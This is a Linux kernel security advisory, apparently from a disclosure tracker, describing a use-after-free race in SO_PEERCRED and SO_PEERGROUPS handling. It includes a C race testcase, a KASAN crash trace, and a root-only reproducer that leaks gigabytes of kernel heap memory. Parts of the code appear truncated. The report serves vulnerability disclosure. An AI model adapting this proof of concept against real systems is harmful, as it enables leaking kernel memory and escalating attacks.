Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())  
# bug description  
In sock_getsockopt() (in net/core/sock.c), the handlers for the  
socket options SO_PEERCRED (has probably had a data race since forever  
that got turned into a UAF read in v2.6.36, commit \"af_unix: Allow  
SO_PEERCRED to work across namespaces\") and  
SO_PEERGROUPS (introduced in v4.13, commit \"net: introduce SO_PEERGROUPS  
getsockopt\") don't use any locking when copying data from  
sk->sk_peer_cred to userspace.  
This can race with operations that update sk->sk_peer_cred:  
- unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)  
- unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)  
This means that if the creds are replaced and freed at the wrong time, a  
use-after-free read occurs.  
From what I can tell, the impact on the kernel is limited to data leakage.  
Theoretically, it could also lead to an out-of-bounds *write* to  
*userspace* memory if a victim process calls SO_PEERGROUPS on a socket  
whose ->sk_peer_cred is going away; however, in a normal scenario,  
SO_PEERGROUPS would only be called on a socket from accept(), and a  
less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred  
on that socket.  
# simple testcase  
this issue can be demonstrated with the following testcase.  
Note that this testcase is using SO_PEERCRED in a weird way: It reads  
the \"peer credentials\" of a listening socket, which doesn't really make  
any semantic sense. As far as I can tell from reading the code, you  
could also trigger the same UAF by racing SO_PEERCRED with repeated  
calls to connect() and shutdown(<fd>, SHUT_RDWR) instead of listen(),  
but then the race would get more complicated.  
// compile with \"gcc -pthread -o peercred_uaf peercred_uaf.c -Wall\"  
#define _GNU_SOURCE  
#include <pthread.h>  
#include <sys/fsuid.h>  
#include <sys/socket.h>  
#include <sys/un.h>  
#include <err.h>  
#include <unistd.h>  
#include <stdio.h>  
#include <sys/syscall.h>  
static int s;  
static uid_t my_uid;  
static gid_t my_gid;  
void *ucred_thread(void *dummy) {  
while (1) {  
struct ucred ucred;  
socklen_t optlen = sizeof(ucred);  
if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen))  
int main(void) {  
my_uid = getuid();  
my_gid = getgid();  
s = socket(AF_UNIX, SOCK_STREAM, 0);  
if (s == -1) err(1, \"socket\");  
struct sockaddr_un bind_addr = {  
.sun_family = AF_UNIX,  
.sun_path = \"/tmp/unix-test-socket\"  
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))  
err(1, \"bind\");  
pthread_t thread;  
if (pthread_create(&thread, NULL, ucred_thread, NULL))  
errx(1, \"pthread_create\");  
while (1) {  
if (listen(s, 16))  
// avoid glibc's automatic thread sync in set*id() wrappers!  
// note that setfsuid() doesn't reallocate on no-op request.  
if (syscall(__NR_setresuid, my_uid, my_uid, my_uid))  
err(1, \"setresuid(raw)\");  
This results in the following splat:  
BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)   
Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619  
CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014  
Call Trace:  
dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1))   
print_address_description.constprop.0 (mm/kasan/report.c:257)   
kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459)   
sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)   
__sys_getsockopt (net/socket.c:2216)   
__x64_sys_getsockopt (net/socket.c:2232)   
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)   
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)   
RIP: 0033:0x7f93cd99a5ca  
Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48  
All code  
0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0  
7: f7 d8 neg %eax  
9: 64 89 01 mov %eax,%fs:(%rcx)  
c: 48 83 c8 ff or $0xffffffffffffffff,%rax  
10: c3 ret   
11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)  
18: 00 00 00   
1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)  
20: 49 89 ca mov %rcx,%r10  
23: b8 37 00 00 00 mov $0x37,%eax  
28: 0f 05 syscall   
2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction  
30: 73 01 jae 0x33  
32: c3 ret   
33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0  
3a: f7 d8 neg %eax  
3c: 64 89 01 mov %eax,%fs:(%rcx)  
3f: 48 rex.W  
Code starting with the faulting instruction  
0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax  
6: 73 01 jae 0x9  
8: c3 ret   
9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6  
10: f7 d8 neg %eax  
12: 64 89 01 mov %eax,%fs:(%rcx)  
15: 48 rex.W  
RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037  
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca  
RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003  
RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700  
R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee  
R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000  
Allocated by task 618:  
kasan_save_stack (mm/kasan/common.c:38)   
__kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467)   
kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219)   
prepare_creds (kernel/cred.c:262)   
__sys_setresuid (kernel/sys.c:666)   
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)   
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)   
Freed by task 618:  
kasan_save_stack (mm/kasan/common.c:38)   
kasan_set_track (mm/kasan/common.c:46)   
kasan_set_free_info (mm/kasan/generic.c:362)   
__kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374)   
kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499)   
rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743)   
__do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559)   
Last potentially related work creation:  
kasan_save_stack (mm/kasan/common.c:38)   
kasan_record_aux_stack (mm/kasan/generic.c:348)   
call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067)   
init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613)   
unix_listen (net/unix/af_unix.c:648)   
__sys_listen (net/socket.c:1727)   
__x64_sys_listen (net/socket.c:1734)   
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)   
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)   
The buggy address belongs to the object at ffff8880355c7c40  
which belongs to the cache cred_jar of size 192  
The buggy address is located 36 bytes inside of  
192-byte region [ffff8880355c7c40, ffff8880355c7d00)  
The buggy address belongs to the page:  
page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4  
head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0  
flags: 0x4000000000010200(slab|head|zone=1)  
raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0  
raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000  
page dumped because: kasan: bad access detected  
Memory state around the buggy address:  
ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc  
ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc  
>ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb  
ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc  
# root-only reproducer for normal systems  
The following is a simple reproducer that attempts to use this issue to  
dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which  
effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups)  
from a dangling pointer in groups_to_user().  
(Note: There are two functions called groups_to_user(). The relevant one  
is in net/core/sock.c.)  
This isn't quite a real exploit - it **requires root privileges** to  
call setgroups() and, if userfaultfd is restricted, also to trap a kernel  
fault with userfaultfd. I expect that you could get around those  
limitations with some work though, assuming that the attacker is running  
in a normal Linux userspace.  
Note that this bug can still be used to dump gigabytes of kernel heap  
memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the  
out-of-bounds read occurs outside of usercopy code:  
static int groups_to_user(gid_t __user *dst, const struct group_info *src)  
struct user_namespace *user_ns = current_user_ns();  
int i;  
for (i = 0; i < src->ngroups; i++)  
if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i))  
return -EFAULT;  
return 0;  
// gcc -o peergroups-leak peergroups-leak.c -Wall -pthread  
#define _GNU_SOURCE  
#include <pthread.h>  
#include <stdbool.h>  
#include <stdlib.h>  
#include <sys/stat.h>  
#include <err.h>  
#include <unistd.h>  
#include <sys/socket.h>  
#include <sys/un.h>  
#include <grp.h>  
#include <sys/wait.h>  
#include <sys/syscall.h>  
#include <fcntl.h>  
#include <sys/eventfd.h>  
#include <limits.h>  
#include <stdio.h>  
#include <sys/ioctl.h>  
#include <sys/mman.h>  
#include <linux/userfaultfd.h>  
#include <linux/membarrier.h>  
// kernel sets upper limit: 65536.  
// up to 2 pages will be served by slabs, we probably don't want that.  
// choose a size between order-3 and order-4 (means needs order-4 page)  
#define ALLOC_SIZE ((0x1000 << 3) * 3 / 2)  
#define NUM_GROUPS ((ALLOC_SIZE - 8) / 4)  
#define OUTPUT_MAPPING_LEN 0x400000000  
static int s;  
static int launch_eventfd;  
static unsigned char *output_mapping;  
static void *getsockopt_threadfn(void *dummy) {  
eventfd_t evval;  
if (eventfd_read(launch_eventfd, &evval))  
err(1, \"eventfd_read\");  
socklen_t optlen = INT_MAX;  
if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) {  
//system(\"cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");  
return NULL;  
void dump(char *label) {  
=== DUMP %s ===\  
\", label);  
system(\"grep 'Node.*Unmovable' /proc/pagetypeinfo\");  
int main(void) {  
char dummy_char;  
// set up sleep-inducing mapping  
output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE,  
if (output_mapping == MAP_FAILED) err(1, \"mmap\");  
if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE))  
err(1, \"mprotect\");  
int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);  
if (uffd == -1) err(1, \"userfaultfd\");  
struct uffdio_api api = {  
.api = UFFD_API,  
.features = 0  
if (ioctl(uffd, UFFDIO_API, &api))  
err(1, \"UFFDIO_API\");  
struct uffdio_register reg = {  
.range = {.start = (unsigned long)output_mapping, .len = 0x1000},  
if (ioctl(uffd, UFFDIO_REGISTER, &reg))  
err(1, \"UFFDIO_REGISTER\");  
// prepare getsockopt() thread  
launch_eventfd = eventfd(0, 0);  
if (launch_eventfd == -1) err(1, \"eventfd\");  
pthread_t thread;  
if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL))  
errx(1, \"pthread_create\");  
// set up for reallocation primitive  
int realloc_fd = open(\"/proc/self/maps\", O_RDONLY);  
if (realloc_fd == -1) err(1, \"open maps\");  
char tmpdir[] = \"/tmp/blah.XXXXXX\";  
if (mkdtemp(tmpdir) == NULL) err(1, \"mkdtemp\");  
if (chdir(tmpdir)) err(1, \"chdir tmpdir\");  
char dummy_name[100];  
memset(dummy_name, 'A', 99);  
dummy_name[99] = '\\0';  
char move_target[200];  
sprintf(move_target, \"d/%s\", dummy_name);  
mkdir(dummy_name, 0700);  
char file_path[200];  
sprintf(file_path, \"%s/a\", dummy_name);  
int path_len = strlen(tmpdir) + strlen(file_path); // approximate  
int fd = open(file_path, O_CREAT|O_RDWR, 0600);  
if (fd == -1) err(1, \"open deep file\");  
if (mmap((void*)0x10000UL, 0x1000, PROT_READ, MAP_SHARED, fd, 0) == MAP_FAILED)  
err(1, \"mmap deep\");  
bool half_deep_probed = false;  
while (path_len < ALLOC_SIZE) {  
mkdir(\"d\", 0700);  
if (rename(dummy_name, move_target)) err(1, \"rename\");  
if (rename(\"d\", dummy_name)) err(1, \"rename 2\");  
path_len += strlen(dummy_name) + 1;  
if (!half_deep_probed && path_len >= ALLOC_SIZE / 2) {  
half_deep_probed = true;  
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)  
err(1, \"read maps half-deep\");  
s = socket(AF_UNIX, SOCK_STREAM, 0);  
if (s == -1) err(1, \"socket\");  
struct sockaddr_un bind_addr = {  
.sun_family = AF_UNIX,  
.sun_path = \"/tmp/unix-test-socket\"  
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))  
err(1, \"bind\");  
pid_t child = fork();  
if (child == -1) err(1, \"fork\");  
if (child == 0) {  
gid_t gid_list[NUM_GROUPS];  
gid_t my_gid = getgid();  
for (int i=0; i<NUM_GROUPS; i++) {  
gid_list[i] = my_gid; // (kernel doesn't deduplicate)  
dump(\"before setgroups\");  
if (setgroups(NUM_GROUPS, gid_list))  
err(1, \"setgroups\");  
dump(\"after setgroups, expect -1\");  
if (listen(s, 16))  
err(1, \"listen in child\");  
return 0;  
int status;  
if (waitpid(child, &status, 0) != child)  
err(1, \"wait\");  
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)  
errx(1, \"child didn't exit cleanly\");  
// wildly flailing around in the hope of flushing out the task  
// (but not the creds yet)  
usleep(400 * 1000);  
for (int i=0; i<4; i++)  
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);  
// launch getsockopt, and wait for it to start  
if (eventfd_write(launch_eventfd, 1)) err(1, \"eventfd_write\");  
usleep(500 * 1000);  
// schedule RCU freeing of the creds  
if (listen(s, 16))  
err(1, \"listen in parent\");  
// wait for RCU (twice to be safe - yes, this is senseless voodoo)  
for (int i=0; i<2; i++)  
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);  
// crappy reallocation attempt, should overwrite length with ASCII  
dump(\"pre-reallocation, expect +1\");  
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)  
err(1, \"read maps deep\");  
dump(\"post-reallocation, expect -1\");  
// resume getsockopt  
struct uffdio_zeropage zeropage = {  
.range = {.start = (unsigned long)output_mapping, .len = 0x1000}  
if (ioctl(uffd, UFFDIO_ZEROPAGE, &zeropage)) err(1, \"ZEROPAGE\");  
// wait for getsockopt to finish  
if (pthread_join(thread, NULL)) err(1, \"pthread_join\");  
// dump results  
int pagemap_fd = open(\"/proc/self/pagemap\", O_RDONLY);  
if (pagemap_fd == -1) err(1, \"open pagemap\");  
unsigned long filled_pages = 0;  
for (unsigned long addr = (unsigned long)output_mapping;  
addr < (unsigned long)output_mapping + OUTPUT_MAPPING_LEN;  
addr += 0x1000) {  
uint64_t val;  
if (pread(pagemap_fd, &val, sizeof(val), addr / 0x1000 * 8) != sizeof(val))  
err(1, \"pagemap read\");  
if ((val >> 62) == 0)  
printf(\"got %lu pages\  
\", filled_pages);  
FILE *hexdump = popen(\"hexdump -C\", \"w\");  
if (!hexdump)  
err(1, \"popen\");  
fwrite(output_mapping, filled_pages * 0x1000, 1, hexdump);  
# disclosure deadline  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2021-12-27.  
Found by: